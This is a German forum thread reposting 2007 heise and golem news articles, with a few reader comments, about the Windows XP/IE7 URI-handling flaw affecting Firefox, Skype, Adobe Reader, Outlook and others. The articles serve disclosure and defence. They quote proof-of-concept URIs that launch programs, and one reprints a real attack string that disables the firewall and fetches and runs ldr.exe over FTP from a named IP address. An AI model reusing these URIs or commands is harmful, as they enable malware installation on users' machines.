Das letzte Woche bekannt gewordene Problem bei der Behandlung spezieller URLs zieht immer weitere Kreise. Neben Firefox kann auch Skype oder das Instant Messenging Programm Miranda als Einfallstor dienen. Das spricht sehr dafür, dass die eigentliche Ursache des Problems die verwirrende Behandlung von URLs unter Windows ist. Fühlt sich ein Programm für einen URL-Typ wie mailto: nicht zuständig, reicht es die URLs zur weiteren Behandlung an das Betriebssystem weiter. Was da jedoch passiert, unterscheidet sich bei Windows XP, je nach dem, ob Internet Explorer 7 installiert ist oder nicht (selbst wenn IE mit dem Protokoll nichts am Hut hat).
(http://www.heise.de/bilder/93535/0/0)
So kommt es, dass URLs, die ein %00 oder ein nacktes Prozentzeichen enthalten – also ein %, das nicht zu einer gültigen Escape-Sequenz wie %FF gehört – direkt Programme mit Parametern starten können. Klickt man in Firefox oder in einer Chat-Nachricht auf eine URL der Form
mailto:test%../../../../windows/system32/calc.exe".cmd
startet der Taschenrechner – zumindest auf einem Windows XP mit IE 7. Unter Vista oder mit dem alten IE6 funktioniert das jedoch nicht. Andere Programme, die sich in die URL-Behandlung einklinken, beeinflussen das Verhalten ebenfalls. Welche Protokolle außer den bislang bekannten mailto:, news:, snews:, nntp: und telnet: eventuell ebenfalls betroffen sind, ist nicht ganz geklärt. Alternativ kann man dies auch testen, indem man die Zeichenkette über "Ausführen" im Start-Menü direkt an das Betriebssystem übergibt. Angreifer könnten dieses Verhalten ausnutzen, um beliebige Befehle auf dem System ihrer Opfer auszuführen, denen sie entweder eine speziell präparierte Web-Seite unterjubeln oder etwa eine Skype-Nachricht senden.
Die Mozilla-Entwickler haben nach der Benachrichtigung durch heise Security, dass auch % den Fehler auslöst, eingesehen, dass ihr erster Ansatz %00 aus URLs herauszufiltern, hinfällig ist. Der Eintrag in der Fehlerdatenbank steht zwar noch auf "RESOLVED/FIXED", aber Mozilla-Entwickler Dan Veditz hat gegenüber heise Security bestätigt, dass man den aktuellen Patch als wirkungslos betrachte, da auch % allein das Problem auslösen kann.
Die Entwickler diskutieren derzeit, wie sie Anwender effizient schützen können, ohne legitime Programme unnötig zu behindern. Dabei stehen sie vor dem Problem, dass immer noch nicht ganz klar ist, wie Windows URLs tatsächlich behandelt. Zumindest gibt es mittlerweile erste Informationen von Microsoft, wie Windows welche URLs behandelt.
Wie Dan Veditz gegenüber heise Security erläuterte, überlegen die Entwickler derzeit, ob sie nicht besser den bereits nahezu fertigen Release Candidate für Version 2.0.0.6 auch ohne diesen Patch ausliefern sollen. Denn der enthält bereits einen anderen Patch für ein ähnlich gelagertes Problem, nämlich die nicht gefilterten Anführungszeichen, auf die manche Programme allergisch reagieren. Das würde nämlich auch schon alle bisher bekannten %-Exploits unterbinden. Damit gewänne man Zeit, um in Ruhe eine saubere Lösung für dieses Problem zu entwickeln, räsoniert Veditz.
Dass Programme wie Skype und Miranda ebenfalls betroffen sind, macht aber deutlich, dass nun definitiv Microsoft in der Pflicht ist, Klarheit in dieses Wirrwarr zu bringen und auch möglichst schnell die Behandlung von URLs durch Windows zu vereinheitlichen. Denn jetzt nur abzuwarten, bis alle Applikationen sich auf das aktuelle Chaos eingestellt haben, hieße, das Problem auf dem Rücken der Anwender auszusitzen.
Update:
Nach Tests von heise Security sind auch Anwender des IM-Clients Miranda gefährdet. Durch einen Klick auf eine Chat-Nachricht startete direkt der Taschenrechner. Somit ist davon auszugehen, dass alle Applikationen, die URLs entgegennehmen und an das Betriebssystem zur Bearbeitung weitergeben, potentiell anfällig für dieses Problem sind.
Quelle : www.heise.de
-
Die Mozilla-Entwickler haben Version 2.0.0.6 des Webbrowsers Firefox freigegeben. Sie bringt eine weitere Korrektur für das Problem, das bei der Behandlung spezieller URLs auftritt, die bei installiertem Internet Explorer 7 unter Windows XP dazu führen, dass Angreifer beliebige installierte Programme aufrufen können. Dadurch könnten bösartige Individuen mit manipulierten Links in Webseiten oder E-Mails auch schädliche Aktionen ausführen.
Firefox 2.0.0.6 enthält den von Daniel Veditz bereits am gestrigen Montag angekündigten Patch, der eine Sicherheitslücke bei der Verarbeitung von URLs mit eingebetteten Anführungszeichen schließt. Der Patch löst auch das Problem bei der Verarbeitung von URLs mit integrierten %00- oder %-Zeichen, durch die installierte Anwendungen aufgerufen werden können. Die Entwickler erläutern in der Sicherheitsmeldung, dass die Lösung noch nicht sauber ist, aber alle bisher bekannten Exploits nicht mehr funktionierten – bei Tests von heise Security passierte beim Folgen der bekannten präparierten Links in der Tat nichts mehr. Wie Veditz am gestrigen Montag gegenüber heise Security äußerte, gewinnen die Entwicker durch die Veröffentlichung der neuen Version Zeit, um eine bessere Lösung für das Problem zu erarbeiten.
Die aktuelle Version behebt ein weiteres Sicherheitsleck, das die Entwickler in der Vorgängerversion mit einem Patch für eine Frame-Spoofing-Sicherheitslücke aufgerissen haben. Dadurch können Angreifer die Rechte etwa für JavaScript-Code mit präparierten Webseiten erhöhen. In den Sicherheitsmeldungen kündigen die Mozilla-Entwickler auch Thunderbird 2.0.0.6, 1.5.0.13 und SeaMonkey 1.1.4 an, die die Schwachstellen ebenfalls beheben. Bislang sind die neuen Versionen allerdings noch nicht auf den Download-Servern aufgetaucht.
Quelle : www.heise.de
-
Mozilla-Entwickler stopfen URI-Lücke auch in ihrem E-Mail-Client
Nachdem die Mozilla-Entwickler die URI-Lücke im Zusammenspiel zwischen Firefox und Internet Explorer 7 eindämmten, folgt nun auch ein entsprechendes Update für den E-Mail-Client Thunderbird. Die Sicherheitslücke erlaubt es Dritten, Applikationen auf fremden Rechnern zu starten und ist nicht auf die Mozilla-Produkte beschränkt.
Die Sicherheitslücke die unter Window XP im Zusammenspiel mit dem Internet Explorer 7 auftritt, erlaubt es, fremden Code auf Windows-Rechnern auszuführen. Dabei kommen zwei Sicherheitslücken zusammen. Das eine von Billy Rios und Nate McFeters entdeckte Problem: URIs für bestimmte Protokolle lassen sich nutzen um eine Applikation auf dem System des Nutzers zu öffnen, je nach angegebener Datei-Endung. Dazu müssen die URIs mit "%00" bzw. "%" versehen werden, dann werden sie an einen Datei-Handler übergeben. So lassen sich Programme, deren Pfad bekannt ist, starten.
Das Problem tritt dann auf, wenn URIs für Protokolle in einer Applikation aufgerufen werden, die für diese nicht zuständig ist und sie stattdessen an eine andere übergibt. Bei Firefox ist dies beispielsweise "mailto", was eigentlich den E-Mail-Client aufrufen sollte, bei zum Beispiel Thunderbird "http".
Zusätzlich gefährlich wird dies durch eine zweite von Jesper Johansson entdeckte Lücke, durch die sich der aufgerufenen Applikation in begrenztem Rahmen Parameter übergeben lassen.
Firefox 2.0.0.6 und nun auch Thunderbird 2.0.0.6 sollen die bisher bekannten Möglichkeiten, eine dieser Sicherheitslücke zu nutzen, beseitigen - das eigentliche Problem bleibt aber bestehen, so die Mozilla-Entwickler. Das problematische Verhalten sei Teil des Windows-Shell-API und daher auch andere Internet-Applikationen neben Firefox betroffen. Heise Security dokumentiert die Probleme bei der URI-Übergabe auch bei Skype und Miranda.
Thunderbird 2.0.0.6 steht ab sofort unter www.mozilla.com zum Download bereit. Details zu den Änderungen finden sich in den Release Notes ( http://www.mozilla.com/en-US/thunderbird/2.0.0.6/releasenotes/ ) .
Quelle : www.golem.de
-
Beide 2.0.0.6er sind auch über die jeweils eingebaute Aktualisierungs-Funktion erhältlich (falls noch nicht automatisch geschehen).
Die dafür zu übertragende Datenmenge ist gering.
-
Billy Rios and Nate McFeters, die Entdecker der URI-Lücke im Open-Source-Browser Firefox, haben in ihrem Blog darauf hingewiesen, dass das eigentliche Problem mit der Veröffentlichung von Firefox 2.0.0.6 Ende Juli nicht beseitigt wurde. So wollen sie einen neuen Weg gefunden haben, um über File-Handler und präparierte Pfade trotzdem weitere Anwendungen zu starten.
Allerdings haben die Firefox-Entwickler bereits mit der Veröffentlichung der aktuellen Browserversion deutlich gemacht, dass das Update nur ein Workaround darstellt, um Zeit zu gewinnen und zumindest vor den bekannten Exploits mit %00- oder %-Zeichen zu schützen. Rios und McFeters haben außer einem Screenshot deshalb auch keine genauen Angaben über das neue Problem veröffentlicht, damit die Entwickler in Ruhe an der Behebung des Fehlers arbeiten können. Wann eine überarbeitete Firefox-Version erscheinen wird, ist nicht bekannt.
Die URI-Lücke tritt bei der Behandlung spezieller URLs auf, die bei installiertem Internet Explorer 7 unter Windows XP dazu führen, dass Angreifer beliebige installierte Programme aufrufen können. Dadurch lassen sich mittels manipulierter Links in Webseiten oder E-Mails auch schädliche Aktionen ausführen. Bislang ist allerdings nicht gänzlich geklärt, was die eigentliche Ursache des Problems ist. Unter anderem ist die verwirrende Behandlung von URLs unter Windows Teil des Problems. Auch Skype, Miranda und wahrscheinlich weitere Anwendungen weisen die URI-Lücke auf.
Quelle : www.heise.de
-
Der Sicherheitsspezialist Alexander Klink hat über eine Möglichkeit berichtet, PCs über eine Art Super-Cookie wiederzuerkennen. Betroffen sind nach bisherigem Kenntnisstand aber nur PCs, deren Anwender den Webbrowser Firefox in seinen Standardeinstellungen nutzen. Die Idee die hinter dem Cookie steckt, beruht auf TLS-Client-Zertifikaten, die auf dem PC beim Besuch einer präparierten Webseite mittels "Signed Public Key And Challenge" (SPKAC) generiert und gespeichert werden.
Diese Zertifikate dienen normalerweise zur bidirektionalen TLS/SSL-Authentifizierung, durch die sich ein Server von der Echtheit eines Clients überzeugen kann. Allerdings lässt sich solch ein Zertifikat ohne viel Zutun des Anwenders von jedem Server mit beliebigen Inhalten installieren. Alles was der Firefox-Anwender sieht, ist eine kurze Meldung "Key generation in progress ... This may take a few minutes ... Please wait ...", die auf schnellen Rechnern innerhalb von Sekundenbruchteilen wieder verschwindet.
Anschließend kommt noch der Hinweis "Your personal certificate has been installed. You should keep a backup copy of this certificate." Die wenigsten Anwender dürften bei derlei Meldungen Verdacht schöpfen oder dazu in der Lage sein, den Vorgang nachzuvollziehen, um das gespeicherte Zertifikat wieder löschen zu können. In Fällen, in denen mit dem Firefox noch kein einziges Passwort im Passwort-Manager gespeichert wurde, erscheint zusätzlich ein Dialog zur Eingabe eines Kennwortes für das Zertifikat. Allerdings dürften auch diesen Dialog nur noch wenige zu Gesicht bekommen.
Da Firefox in der Standardeinstellung versucht, ein vom Server angefordertes Client-Zertifikat automatisch auszusuchen, kann jeder beliebige Server – auch aus einer anderen Domain – beim Besuch das Zertifikat herunterladen und so den Rechner wiedererkennen. In einer Diskussion zu dem Problem wurde hervorgehoben, dass auch sehr sicherheitsbewußte Anwender des Anonymisierungsnetzes Tor davon betroffen sind, da sich so zumindest die besuchten Seiten nachvollziehen ließen. Auch Pivoxy soll nicht vor den Super-Cookies schützen.
Anders als von Klink zunächst angenommen, funktioniert solch ein Cookies sowohl in Firefox 2.0 als auch in Firefox 1.5 (jeweils unter Windows und Linux). Andere Browser sollen laut Bericht von dem Problem nicht betroffen sein: Opera und Konqueror öffnen mehrere Dialoge, die den Anwender misstrauisch werden lassen sollten, der Internet Explorer unterstützt kein SPKAC, und bei Safari ist es dem Autor nicht gelungen, ein Zertifikat zu übermitteln. Eine Online-Demo führt das Problem vor: Firefox 2.0.x TLS client certificate tracking POC. In der Demo ist zwar noch die Angabe eines Namens erforderlich, bei einem echten Tracking-Versuch könnte dies ein JavaScript jedoch automatisch übernehmen. Abhilfe bringt derzeit nur, unter "Einstellungen/Erweitert/Verschlüsselung/Zertifikate" die Option "Jedes mal nachfragen" zu setzen. Dann erscheint immerhin ein Dialog, dass ein Server ein Zertifikat abfragen möchte, was sich im Zweifel unterbinden lässt.
Siehe dazu auch:
* Firefox 2.0.x: tracking unsuspecting users using TLS client certificates, Fehlerbericht von Alexander Klink
* Firefox 2.0.x TLS client certificate tracking POC, Demo zum Super-Cookie
Quelle und Links : http://www.heise.de/security/news/meldung/96229/Benutzer-Tracking-mit-SSL-Zertifikaten-in-Firefox
-
Nach einer Benachrichtigung durch heise Security hat Skype in der aktuellen Version 3.5.0.239 ein Sicherheitsproblem bei der Behandlung spezieller URLs stillschweigend behoben. Andere Programme wie Adobes Acrobat Reader, der Netscape-Browser und das Instant-Messaging-Programm Miranda starten hingegen immer noch bei einem einfachen Klick auf spezielle URLs mit einem %-Zeichen beliebige Programme und installieren damit möglicherweise Spyware auf dem System der Anwender. Ein ähnliches Problem haben die Mozilla-Entwickler kürzlich in Firefox zumindest provisorisch beseitigt.
Doch während das Mozilla-Team die Lücke als kritisch einstufte, dazu eine eigene Sicherheitsnotiz herausgab und vor allem die Anwender über den Update-Mechanismus mit der verbesserten Version versorgte, hielt Skype nichts von alledem für nötig. Lediglich der nichtssagende Hinweis "bugfix: Links with invalid % encodings were executed" in den Release Notes, die kein normaler Anwender zu Gesicht bekommt, kündet von dem behobenen Sicherheitsproblem. Skype-Nutzer sollten deshalb so schnell wie möglich selbst die aktualisierte Version einspielen. Das geht recht einfach über "Hilfe/Auf Aktualisierung prüfen".
Es lässt sich trefflich darüber streiten, ob wirklich Skype oder nicht etwa Windows für das Problem verantwortlich ist. So betonte auch Jüri Shamov-Liiver, Skypes Leiter der Abteilung Produktsicherheit gegenüber heise Security, dass dies eigentlich ein Windows-Problem sei. Skype reiche die URL lediglich an das Betriebssystem weiter. Tatsache ist, dass Microsoft mit der Installation des Internet Explorer 7 unter Windows XP offenbar die Behandlung von URLs durch das Betriebssystem so geändert hat, dass spezielle Links, die ein %-Zeichen enthalten, direkt zum Aufruf beliebiger Programme führen können.
(http://www.heise.de/bilder/96921/1/1)
Skype und Firefox haben dieses Problem jetzt durch zusätzliche Filter behoben – aus der Welt ist es damit keineswegs. Theoretisch sind alle nicht von Microsoft stammenden Applikationen gefährdet, die URLs an Windows weiterreichen, weil sie sich nicht zuständig fühlen. Eine kurze Stichprobe von heise Security zeigte, dass beispielsweise Adobes aktueller Acrobat Reader durchaus auch praktisch als Einfallstor für Schädlinge dienen könnte. Ein Klick auf einen Link in einer entsprechend präparierten PDF-Datei startete bei einem schnellen Test den Taschenrechner. Auch der aktuelle Netscape-Browser und die soeben veröffentlichte Version 0.7 des Instant Messengers Miranda erwiesen sich als anfällig; die Liste lässt sich vermutlich mit etwas Suchen weiter verlängern.
(http://www.heise.de/bilder/96921/0/1)
(http://www.heise.de/bilder/96921/2/1)
Microsoft sieht jedoch weiterhin keine Veranlassung, an Windows nachzubessern. Auf eine diesbezügliche Anfrage von heise Security an Microsofts Security-Team kam die lapidare Antwort, dass dies keine Schwachstelle in einem Microsoft-Produkt sei. Dass viele Windows-Anwender von einem Problem betroffen sind, das erst durch die Installation des Internet Explorer 7 hervorgerufen wird, und unter Vista erst gar nicht auftritt, reicht offenbar nicht aus, ein Update für Windows XP zu rechtfertigen. Vielmehr sieht es so aus, als wolle man in Redmond das Problem auf dem Rücken der Anwender aussitzen.
Quelle : www.heise.de
-
Adobe warnt in einer Sicherheitsnotiz vor einem kritischen Sicherheitsproblem und beschreibt, wie sich Anwender davor schützen können. Betroffen sind Adobe Reader, Adobe Acrobat Standard, Professional und Elements bis einschließlich 8.1 und Adobe Acrobat 3D.
Anzeige
Bei der Lücke handelt es sich offensichtlich um das bereits geschilderte URI-Problem von Windows. Wie viele andere Applikationen auch, reichen Adobes Viewer URLs, für die sie sich nicht zuständig fühlen, via ShellExecute() an das Betriebssystem weiter. Windows XP mit Internet Explorer 7 reagiert auf eine URL der Form
mailto:test%../../../../windows/system32/calc.exe".cmd
indem es den Taschenrechner startet. Ohne IE7 startet der zuständige URL-Handler Outlook Express und unter Vista erscheint eine Fehlermeldung. Dieses verwirrende Verhalten lässt sich nachvollziehen, indem man diese Zeichenkette unter "Start/Ausführen" eingibt; es ist nicht auf mailto-URLs beschränkt.
Mit entsprechend präparierten URLs lassen sich unter Windows XP mit IE7 viele Applikationen als Einfallstor zum Beispiel für Spyware missbrauchen, die ohne Internet Explorer 7 noch sicher waren. Firefox und Skype haben bereits reagiert und dementsprechende Updates veröffentlicht, um ihre Anwender zu schützen. Im Fall der Adobe-Software ist das Problem besonders kritisch, da viele User PDF-Dateien bedenkenlos öffnen und die gefährlichen URLs dabei automatisch gestartet werden können.
Der von Adobe beschriebene Workaround setzt im Registry-Zweig
Acrobat: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Adobe\Adobe Acrobat\8.0\FeatureLockDown\cDefaultLaunchURLPerms
beziehungsweise
Reader: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Adobe\Acrobat Reader\8.0\FeatureLockDown\cDefaultLaunchURLPerms
in tSchemePerms den Wert von mailto:2 auf mailto:3, was das Ausführen von mailto-URLs unterbindet. Die von heise Security erstellte Demonstrationsdatei lieferte damit nur noch eine Fehlermeldung.
Demnächst will Adobe auch ein Update der Software bereitstellen, das vor diesem Problem schützt. Netscape, Miranda, mIRC und vermutlich eine ganze Reihe weiterer Applikationen können jedoch ebenfalls als Einfallstor dienen. Nachdem der Internet Explorer 7 – seit neuestem auch ohne WGA-Prüfung – über die automatische Update-Funktion an Windows-XP-Systeme ausgeliefert wird, dürfte sich die Zahl der betroffenen Anwender noch weiter erhöhen.
Die einzige Möglichkeit, das Problem grundsätzlich aus der Welt zu schaffen, wäre ein Patch von Microsoft, der das Verhalten von Windows XP beispielsweise dem von Vista angleicht. Doch wie eine Nachfrage von heise Security ergab, ist der derzeit nicht in Aussicht.
Quelle : www.heise.de
-
Wie der Sicherheitsdienstleister Secunia meldet, ist auch Outlook Express und 2000 vom Windows-URI-Problem betroffen. Somit kann nicht nur in Firefox, Skype, Adobe Reader, Miranda, mIRC und Netscape sondern auch in Microsoft-Applikationen ein falscher Klick dazu führen, dass beliebige Programme auf dem System des Anwenders gestartet werden. Bislang hatte Microsoft Forderungen nach einem Patch, der das Problem an der Wurzel, nämlich in Windows behebt, mit dem Verweis gekontert, man sehe kein Sicherheitsproblem in Microsoft-Produkten.
(http://www.heise.de/bilder/97133/0/0)
Ursache des Problems ist das inkonsistente Verhalten von Windows beim Öffnen bestimmter URLs mit ungültigen Zeichenfolgen. Während Windows XP mit Internet Explorer 6 zu deren Bearbeitung den zuständigen URL-Handler – bei "mailto:" beispielsweise Outlook Express – startet, führt es mit installiertem Internet Explorer 7 direkt eine Applikation aus; in den harmlosen Demos meist den Taschenrechner. Windows Vista hingegen erzeugt bei den gleichen URLs lediglich eine Fehlermeldung. Der Sicherheitsdienstleister Secunia war einer der ersten, der beim Bekanntwerden dieses Problems nicht Firefox, sondern Windows als eigentliche Ursache ausmachte.
Viele Applikationen reichen URLs, für die sie sich nicht zuständig fühlen, einfach an das Betriebssystem weiter. So auch Outlook Express und Outlook 2000, wenn es die in einer VCard angegebene URL öffnen soll. In einem kurzen Test von heise Security startete beim Klick auf "Gehe zu" im Adressbuch ohne Nachfrage der Taschenrechner. Das kann unter Windows XP mit IE7 dann dazu führen, dass Angreifer über speziell präparierte VCards beispielsweise Spyware auf einem System einschleusen könnten.
Erst gestern hatte Adobe vor einem ähnlichen Problem in Adobe Reader/Acrobat gewarnt und einen Patch für Ende Oktober in Aussicht gestellt. Firefox und Skype hatten bereits davor Updates veröffentlicht, die ihre Anwender schützen sollen; mIRC, Netscape und Miranda sind immer noch anfällig. Mit der Veröffentlichung der Tatsache, dass auch Outlook in die URI-Falle tappt, steigt die Hoffnung, dass Anwender nicht über Monate hinweg kritische Lücken in dutzenden Applikationen beheben müssen, sondern sich Microsoft nun doch des Problems annimmt und das Verhalten von Windows etwas berechenbarer gestaltet.
Quelle : www.heise.de
-
Nach einer 180-Grad-Kehrtwende bestätigt Microsoft nun die Existenz einer "URL-Handling-Sicherheitslücke in Windows" in einem Knowledge-Base-Artikel und stellt einen Patch in Aussicht. Der Hauptgrund für den Sinneswandel ist laut Security Response Center, dass Microsoft in der Diskussion um das Problem selber zur Verwirrung beigetragen habe, indem es heise Security in einer Stellungnahme zu der Lücke das falsche "Set of Talking Points" geliefert habe, also laut Wikipedia den falschen Satz an PR-Phrasen. Die sich an eine diesbezügliche Meldung anschließende Diskussion auf der Sicherheitsmailingliste Full Disclosure habe die Redmonder dann bewogen, doch zu reagieren. Ein weiterer Grund könnte allerdings sein, dass sich kürzlich heraussstellte, dass auch Microsoft-Anwendungen wie Outlook Express und Outlook 2000 von dem Problem betroffen sind.
Im Blog des MSRC wird auch erklärt, wieso das Problem nur in Kombination mit dem Internet Explorer 7 unter Windows SP und Server 2003 auftritt. Mit der Installation des IE7 werden aufgerufene URIs zuerst genauer vom Browser auf ihre Gültigkeit untersucht und im Zweifel verworfen. Laut Microsoft versucht anschließend aber noch die Windows-Funktion ShellExecute() die URI zu interpretieren. Unter Vista wird dabei eine fehlerhafte URI, etwa mit Prozent- und Anführungszeichen an bestimmten Stellen, verworfen – unter XP allerdings nicht, was dazu führt, dass sich installierte Programme über ShellExecute() mit beliebigen Parametern starten lassen. Mit dem Internet Explorer 6 unter XP läuft die Verarbeitungsreihenfolge einer URI andersherum, weshalb der Fehler dort nicht auftritt.
Durch den geplanten Patch soll die URI-Verarbeitung der Funktion ShellExecute() sicherer werden. Daneben empfiehlt Microsoft Herstellern von Anwendungsprogrammen aber ebenfalls, die Gültigkeit der übergebenen URI zu prüfen, wie es Firefox und Skype bereits getan haben und Adobe demnächst tun will.
Quelle : www.heise.de
-
Über zwei Monate sind vergangen, seit dem die kritische URI-Lücke in Windows bekannt wurde – Microsoft hat aber bislang immer noch keinen Patch bereitgestellt. Immer mehr Anwender greifen daher zur Selbsthilfe und versuchen ihre Systeme mit diversen Workarounds abzudichten. Das seltsame Verhalten von Windows XP mit installiertem Internet Explorer 7 kann dazu führen, dass das Öffnen einer Datei in einer Anwendung den Rechner mit Schad-Software infiziert. Die Entwickler von Firefox und Skype haben Vorkehrungen getroffen, dies zu verhindern, andere wie Adobe Reader, Outlook Express/2000, Miranda und mIRC sind nach wie vor anfällig.
Jetzt hat ein Hacker mit dem Pseudonym KJK::Hyperion sogar einen provisorischen und natürlich höchst inoffiziellen Patch veröffentlicht. Dieser klinkt sich in die Verarbeitung der anfälligen Windows-Funktion ShellExecute() ein und versucht, die Aufrufparameter vor der Bearbeitung durch Windows zu bereinigen. Doch selbst der Entwickler warnt: "Der aktuelle Patch ist nahezu ungetestet und wurde keinerlei Qualitätskontrolle unterzogen ..."
Es ist also nicht zu empfehlen, diesen Patch auf Produktionssystemen zu installieren. Immerhin stellt KJK::Hyperion seinen Workaround nicht nur als installationsfertige DLL-Bibliothek, sondern auch als Quelltext unter einer Open-Source-Lizenz zur Verfügung. Somit können andere diesen Code evaluieren und unter Umständen verbessern.
Wann Microsoft eine richtige Lösung für das Problem bereitstellt, steht nach wie vor in den Sternen. Über Monate hinweg hatten die Redmonder alle Nachfragen in diese Richtung abgewimmelt. Erst vor einer Woche, nachdem Secunia nachgewiesen hatte, dass auch Outlook Express/2000 als Einfallsvektor für Angriffe genutzt werden könnte, bestätigte Microsoft überhaupt die Existenz eines Problems in Windows XP. Der Fehler soll laut einem Blog-Eintrag des Microsoft Security Response Centers durch ein Update des Codes in ShellExecute() erfolgen. Doch der nächste reguläre Termin für ein solches Update wäre erst der Patchday Mitte November; und für ein Update außer der Reihe gibt es bislang keine Anzeichen.
http://spacebunny.xepher.net/hack/shellexecutefiasco/
Quelle : www.heise.de
-
Der Autor des "nahezu ungetesteten", inoffiziellen Patches für das URI-Problem in Windows XP mit IE7 hat selbst einen gravierenden Fehler entdeckt. Es sei nach seinen eigenen Worten ein "grauenhaftes Speicherleck"; ein Fehler für den er sich eigentlich in die Ecke stellen müsste und schämen, meint KJK::Hyperion in seinem Beitrag auf einer Sicherheits-Mailingliste. Er stellt zwar auf seinen Seiten eine aktualiserte Fassung der Bibliothek bereit, aber auch deren Installation ist nicht zu empfehlen. Wann jedoch ein offizieller Patch von Microsoft erscheint, steht immer noch in den Sternen.
Quelle : www.heise.de
-
Adobe hat wie angekündigt die Versionen 8.1.1 von Adobe Reader und Acrobat veröffentlicht, in denen der Umgang mit URIs beziehungsweise URLs in PDF-Dokumenten überarbeitet wurde. Durch das Öffnen manipulierter Dokumente ist es möglich, auf dem System installierte Anwendungen mit beliebigen Parametern zu starten. Ein Angreifer kann darüber die Kontrolle über einen Rechner erlangen, in dem ein Opfer etwa eine auf einem Webserver abgelegte oder per Mail erhaltene PDF-Datei öffnet. Dazu ist es nicht einmal nötig, dass der Anwender auf einen Link im Dokument klickt. Durch die Nutzung von ActionScript in PDF kann das Dokument bereits beim Laden die URL selbst aufrufen.
Ein Update für Adobe Reader 7.0.9 und Acrobat 7.0.9 soll zu einem späteren Zeitpunkt erscheinen. Anwender, die nicht auf die Versionen 8.1.1 wechseln können, empfiehlt Adobe, die Verarbeitung der mailto-URI in der Windows-Registry zu deaktivieren. Eine Anleitung dazu finden Betroffene in Adobes Fehlerbericht. Allerdings ist das Problem prinzipiell nicht auf mailto-URIs beschränkt, eine URL wie http:%xx../../../../../../../../../windows/system32/calc.exe".cmd kann den Taschenrechner ebenfalls starten.
Auch AOL hat nachgelegt und die Fassung 9.0.0.1 des Netscape-Webbrowsers freigegeben, in der neben zahlreichen anderen Lücke auch die URI-Problematik gelöst wurde. Damit ist der Netscape-Browser sicherheitsmäßig auf dem Stand der aktuellen Firefox-Version 2.0.0.8.
Von den bekannten verwundbaren Anwendungen bleibt bis dato nur der Instant Messenger Miranda verwundbar. Das für den November-Patchday geplante Update für Windows sollte allerdings auch dort und mit anderen Anwendungen das Problem entschärfen.
Quelle : www.heise.de
-
Berichten auf der Sicherheitsmailingliste Full Disclosure zufolge gibt es bereits aktive Angriffe auf Anwender mittels präparierter PDF-Dokumente. Dabei enthalten die per E-Mail verschickten Dokumente eine URL, die versucht, über die bekannte URI-Lücke Befehle auf dem System auszuführen. Dabei soll es sich um folgende Befehlsfolge handeln:
mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"
Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet. Was dann im Weiteren geschieht, ist den Berichten nicht zu entnehmen. Es ist anzunehmen, dass sich ein Schädling auf dem System einnistet. Um Opfer eines Angriffs zu werden, ist es nicht zwingend erforderlich, einen Link im Dokument anzuklicken. Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.
Die bösartigen PDF-Dateien sollen unter anderem Namen wie BILL.pdf, INVOICE.pdf und STATEMENT.pdf tragen, während als Betreffzeilen INVOICE alacrity, STATEMET indigene und INVOICE depredate gesichtet worden sind. Adobe stellt seit Anfang der Woche das Update 8.1.1 für den Adobe Reader und Acrobat zur Verfügung, in der das URI-Problem behoben ist. Anwender sollten so schnell wie möglich auf die aktuelle Version wechseln. Für diejenigen, denen aus bestimmten Gründen kein Update möglich ist, empfiehlt Adobe, in der Registry die Verknüpfung der mailto-URI mit Adobe-Produkten zu lösen. Ein Anleitung dazu findet sich hier: Update available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat.
Update
Derzeit ist die Windows-Version des Adobe Reader 8.1.1 noch nicht in deutsch verfügbar. Interressanterweise ist bereits für Linux ein RPM-Paket der deutschen Version 8.1.1 herunterladbar – allerdings kommt dort das URI-Problem gar nicht zum Tragen.
Quelle und Links : http://www.heise.de/newsticker/meldung/97866
-
[...]
Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet.
[...] Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.
Kleine verständnissfrage: wenn ich eine andere Firewall (kasper) benutze und die Java unterstützung im Adope-reader disable, bin ich dann gegen dieses problem gefeit ?
-
Könnte klappen ...
btw. es gibt ja auch gute Alternativen zum Acrobat Reader ;)
das z.B. : http://download.winboard.org/details.php?file=128
-
Danke.
Werde das mal auf dem honeypot-rechner ausprobieren, sobald solche mail eintrifft.
ergebniss geb ich dann bekannt.
-
Der Foxit PDF Reader ist sicher noch kein vollwertiger Ersatz für den von Adobe, aber hier nutze ich den schon lange als Default-Anwendung.
Den anderen habe ich in's Send To Kontextmenü eingebaut.
Hinzu kommt, dass ich für's DSL-Modem (wie für jede andere Komponente auch) einen extra Netzschalter habe. Das läuft nur, wenn ich's für sinnvoll halte, den Rest der Zeit spare ich mir auch den Strom.
Browser-Plugins für PDF lehne ich ab.
Default wird nicht geöffnet sondern gespeichert.
Damit fällt Nachladen flach.
-
foxit benutz ich z.teil auch, aber speziell bei arabisch & Persisch macht das teil ab und an probleme.
von daher leider adobe und die 8er version will ich mir nicht antun, die ruft mir zu oft nach hause an. >:(
-
Eine Schwachstelle in Firefox lässt sich für Cross-Site-Scripting-Attacken ausnutzen, durch die ein Angreifer etwa Anmeldeinformationen eines Opfers auf Webseiten wie MySpace und ähnlichen Angeboten abgreifen kann. Das Problem ist zwar bereits seit Anfang dieses Jahres bei den Firefox-Entwicklern bekannt und auch in einem Bugzilla-Eintrag dokumentiert, bislang hat man aber noch keine Änderung in Firefox vorgenommen, um es aus der Welt zu schaffen. Der Sicherheitsspezialist Petko Petkof ist nun offenbar abermals über den Fehler gestolpert und hat ihn in seinem Blog veröffentlich, sodass nun bereits das US-CERT einen Fehlerbericht dazu herausgegeben hat.
Die Schwachstelle beruht auf der Implementierung des von Sun spezifizierten jar-Protokolls, mit dem der Zugriff auf einzelne Dateien innerhalb eines Java-Archivs von einer Webseite möglich ist:
jar:http://www.foo.com/bar/baz.jar!/COM/foo/Quux.class
